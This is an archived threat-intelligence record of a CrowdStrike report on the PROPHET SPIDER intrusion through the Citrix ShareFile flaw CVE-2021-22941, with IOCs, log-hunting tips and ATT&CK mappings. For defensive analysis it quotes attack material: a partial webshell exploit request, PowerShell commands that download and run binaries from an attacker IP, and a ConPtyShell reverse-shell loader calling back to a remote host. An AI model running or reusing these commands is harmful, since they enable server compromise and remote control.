{
	"id": "97c4622f-58e6-4180-a053-dd855cb5e2a2",
	"created_at": "2026-04-06T00:15:59.634558Z",
	"updated_at": "2026-04-10T03:28:33.60118Z",
	"deleted_at": null,
	"sha1_hash": "7c50cf1ca0b5c172eb3762ecc09631891b807544",
	"title": "PROPHET SPIDER Exploits Citrix ShareFile | CrowdStrike",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 85189,
	"plain_text": "PROPHET SPIDER Exploits Citrix ShareFile | CrowdStrike\r\nBy Chris Nguyen - Eric Loui\r\nArchived: 2026-04-05 17:47:29 UTC\r\nAt the start of 2022, CrowdStrike Intelligence and CrowdStrike Services investigated an incident in which PROPHET\r\nSPIDER exploited CVE-2021-22941 — a remote code execution (RCE) vulnerability impacting Citrix ShareFile Storage\r\nZones Controller — to compromise a Microsoft Internet Information Services (IIS) web server. The adversary exploited the\r\nvulnerability to deploy a webshell that enabled the downloading of additional tools. This incident highlights how PROPHET\r\nSPIDER continues to evolve its tradecraft while still exploiting known web-server vulnerabilities.\r\nBackground\r\nPROPHET SPIDER\r\nPROPHET SPIDER is an eCrime actor, active since at least May 2017, that primarily gains access to victims by\r\ncompromising vulnerable web servers, which commonly involves leveraging a variety of publicly disclosed vulnerabilities.\r\nThe adversary has likely functioned as an access broker — handing off access to a third party to deploy ransomware — in\r\nmultiple instances.\r\nCVE-2021-22941\r\nIn September 2021, Citrix disclosed a relative path-traversal vulnerability in ShareFile Zones Storage Controller, designated\r\nCVE-2021-22941. Shortly thereafter, security researchers demonstrated a proof-of-concept (POC) exploit for the CVE.\r\nBased on the known technical details, others were able to reproduce fully weaponized exploits for CVE-2021-22941 that\r\nhave proliferated since mid-October 2021. The vulnerability allows an adversary to overwrite an existing file on a target\r\nserver via an uploadid parameter passed in an HTTP GET request.\r\nInitial Access and Exploitation\r\nOn Jan. 10, 2022, PROPHET SPIDER sent an HTTP POST request to an IIS server of a CrowdStrike Falcon® platform\r\ncustomer, using the user agent python-requests/2.26.0. 
The request to /upload.aspx contained the following command:\r\nPOST /upload.aspx?\r\nuploadid=%40using+System.Diagnostics%3B%40%7Bint+idx0%3D+0%3Bstring+str_idx0+%3D+idx0.ToString%28%29%3B+int+idx1+%3D+1%3Bstring+str_idx1+\r\nThere are three key components to this request.\r\nThe URI endpoint /upload.aspx is used for ShareFile uploads and usually comes with parameters to define upload object\r\nspecifications, such as uploadid, cid or batchid. In this case, the uploadid parameter contained a webshell:\r\nuploadid=@using+System.Diagnostics;@{int+idx0=+0;string+str_idx0+=+idx0.ToString();+int+idx1+=+1;string+str_idx1+=+idx1.ToString();strin\r\nThis is content that the exploit will write to an ASP.NET file; it uses Razor syntax, where @\u003ckeyword\u003e allows a keyword to\r\nbe used as a variable name, and @{ is used to open a C# code block. The C# Process.Start(cmd,arg); method provides the\r\nbackdoor function that will be used to execute arbitrary commands.\r\n/../../ConfigService\\Views\\Shared\\Error.cshtml\r\nThis is the relative path traversal that will allow the payload to overwrite the legitimate Error.cshtml page.\r\nbp=123\u0026accountid=123\r\nThese are parameters that are expected by the upload function and included to prevent an error from occurring. Additionally,\r\nthese values match the default characters used in the previously mentioned publicly available CVE-2021-22941 exploit.\r\nAnalysts looking for evidence of attempted CVE-2021-22941 exploitation can examine IIS access logs for web requests\r\nthat:\r\nTarget upload.aspx\r\nContain encoded strings for ../ and ConfigService\\Views\\Shared\\Error.cshtml in the URL parameters\r\nMay contain \u0026bp=123\u0026accountid=123 if the attacker has not customized the payload\r\nOnce the webshell is set, it can be accessed by sending an HTTP request to /configservice/Home/Error with one or two URL\r\nparameters. 
ASP.NET will direct these requests to Error.cshtml, which usually contains a simple HTML header saying\r\n“Sorry, an error occurred while processing your request.” Due to the exploit, the contents have been replaced with the C#\r\ncode block and will invoke Process.Start(cmd,arg) using the URL parameter(s) passed in the GET request.\r\nhttps://www.crowdstrike.com/blog/prophet-spider-exploits-citrix-sharefile/\r\nPage 1 of 3\n\nPost-exploitation Commands \r\nAfter achieving initial access, PROPHET SPIDER used the following command to test connectivity:\r\nCMD.exe /C nslookup xab8v404gwftvw5nvw95ig6ybphf54.burpcollaborator[.]net\r\nIf successful, this command performs a name lookup on a subdomain of burpcollaborator[.]net, which the open-source\r\nvulnerability-testing tool BurpSuite can check to confirm responding systems.\r\nThe adversary next attempted to execute encoded PowerShell commands that decoded to:\r\npowershell -Command (New-Object\r\nSystem.Net.WebClient).DownloadFile ('http[:]//45.61.136[.]39:443/wget[.]bin','C:\\Windows\\temp\\wget.bin')\r\ncmd /c c:\\Windows\\temp\\wget.bin -t 1 http[:]//45.61.136[.]39:443/winn.exe -O c:\\windows\\temp\\wi.exe\r\nThese commands attempted to download the legitimate wget utility from a remote IP address, then attempted to use wget to\r\ndownload another remote binary, named winn.exe. The winn.exe download was unsuccessful. 
The adversary then attempted\r\nto install an open-source reverse shell from GitHub:\r\npowershell -Command IEX(IWR https[:]//raw.githubusercontent[.]com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing) ; Invoke-ConPtyShell -RemoteIp 107.181.187[.]184 -RemotePort 4242 -Rows 44 -\r\nCols 166\r\nThis payload attempted to load the ConPtyShell reverse shell directly from GitHub, with parameters to connect back to the\r\nIP address 107.181.187[.]184 over TCP port 4242.\r\nConclusion\r\nAs CrowdStrike Intelligence previously reported, PROPHET SPIDER is an opportunistic eCrime actor that exploits publicly\r\ndisclosed server vulnerabilities, often to deliver webshells. This recent CVE-2021-22941 exploitation demonstrates the\r\nadversary’s willingness to operationalize new and different exploit code, as well as their enduring preference for deploying\r\nthe wget utility to begin operations.\r\nIndicators of Compromise (IOCs)\r\nDescription IP Addresses\r\nSite hosting wget.bin and\r\nwinn.exe\r\n45.61.136\u003c.\u003e39\r\nCallback destination for\r\nConPtyShell reverse shell\r\n107.181.187\u003c.\u003e184\r\nSource observed exploiting CVE-2021-22941\r\n188.119.149\u003c.\u003e160\r\nSite hosting ConPtyShell reverse\r\nshell\r\nhxxps\u003c:\u003e//raw.githubusercontent\u003c.\u003ecom /antonioCoco/ConPtyShell/master\r\n/Invoke-ConPtyShell.ps1\r\nMITRE ATT\u0026CK® Observed Tactics\r\nTactic Description\r\nInitial Access T1190: Exploit Public Facing Application\r\nExecution T1059.001: Command and Scripting Interpreter: PowerShell\r\nPersistence T1505.003: Server Software Component: Web Shell\r\nCommand and Control T1071: Application Layer Protocol\r\n  T1105: Ingress Tool Transfer\r\nAdditional Resources\r\nRead more about CrowdStrike’s observations of PROPHET SPIDER activity in this blog: PROPHET SPIDER\r\nExploits Oracle WebLogic to Facilitate Ransomware Activity.\r\nTo learn more about how to incorporate intelligence on threat actors into your 
security strategy, visit the\r\nCROWDSTRIKE FALCON® INTELLIGENCE™ Premium Threat Intelligence page.\r\nVisit the CrowdStrike website to learn more about CrowdStrike Services.\r\nGet a full-featured free trial of CrowdStrike Falcon® Prevent™ and learn how true next-gen AV performs against\r\ntoday’s most sophisticated threats.\r\nSource: https://www.crowdstrike.com/blog/prophet-spider-exploits-citrix-sharefile/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://www.crowdstrike.com/blog/prophet-spider-exploits-citrix-sharefile/"
	],
	"report_names": [
		"prophet-spider-exploits-citrix-sharefile"
	],
	"threat_actors": [
		{
			"id": "056826cb-6e17-4954-a9b4-2cc8c6ae3cb8",
			"created_at": "2023-03-04T02:01:54.115678Z",
			"updated_at": "2026-04-10T02:00:03.360898Z",
			"deleted_at": null,
			"main_name": "Prophet Spider",
			"aliases": [
				"GOLD MELODY",
				"UNC961"
			],
			"source_name": "MISPGALAXY:Prophet Spider",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "47b52642-e5b8-4502-b714-b625002d86aa",
			"created_at": "2024-06-19T02:03:08.086579Z",
			"updated_at": "2026-04-10T02:00:03.812509Z",
			"deleted_at": null,
			"main_name": "GOLD MELODY",
			"aliases": [
				"PROPHET SPIDER",
				"UNC961"
			],
			"source_name": "Secureworks:GOLD MELODY",
			"tools": [
				"7-Zip",
				"AUDITUNNEL",
				"BURP Suite",
				"GOTROJ",
				"JSP webshells",
				"Mimikatz",
				"Wget"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434559,
	"ts_updated_at": 1775791713,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7c50cf1ca0b5c172eb3762ecc09631891b807544.pdf",
		"text": "https://archive.orkl.eu/7c50cf1ca0b5c172eb3762ecc09631891b807544.txt",
		"img": "https://archive.orkl.eu/7c50cf1ca0b5c172eb3762ecc09631891b807544.jpg"
	}
}